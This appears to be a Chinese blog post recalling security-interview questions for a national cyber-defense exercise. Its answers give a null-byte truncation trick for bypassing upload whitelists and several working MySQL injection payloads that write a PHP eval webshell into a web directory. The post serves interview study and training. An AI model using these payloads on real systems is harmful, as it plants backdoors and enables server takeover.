记一次国护面试题

先看简历，然后根据你的项目经验去先问一些针对性问题，这些就自由回答了。

问：绕过白名单的方式

答：

00截断

问：00截断应该写在哪里

答：

放在文件上传的路径后面

问：你一般如何用sql写入webshell呢

答：

常见的仅适用于联合注入。
union 跟 select into outfile
union select 1,"<?php @eval($_POST['xxxx']);?>",3 into outfile 'D:\\www\\WWWroot\\hack.php'

或者写入到表，然后在导出为文件

写入到日志里

盲注或者报错常用分隔符注入
into outfile 'D:\\www\\WWWroot\\hack.php' lines terminated by '<?php @eval($_POST['xxxx']);?>'

还有一些这些大佬blog写的更全可以学习

SQL注入写入webshell-CSDN博客

MySQL注入点写入WebShell的几种方式 - Bypass - 博客园 (cnblogs.com)

最后一题给了两张图（忘截图了）

让你判断是不是误报（所以需要对一些漏洞的流量有一些认知）

后面我会发一些网络搜集到的和之前面试的一些题目上来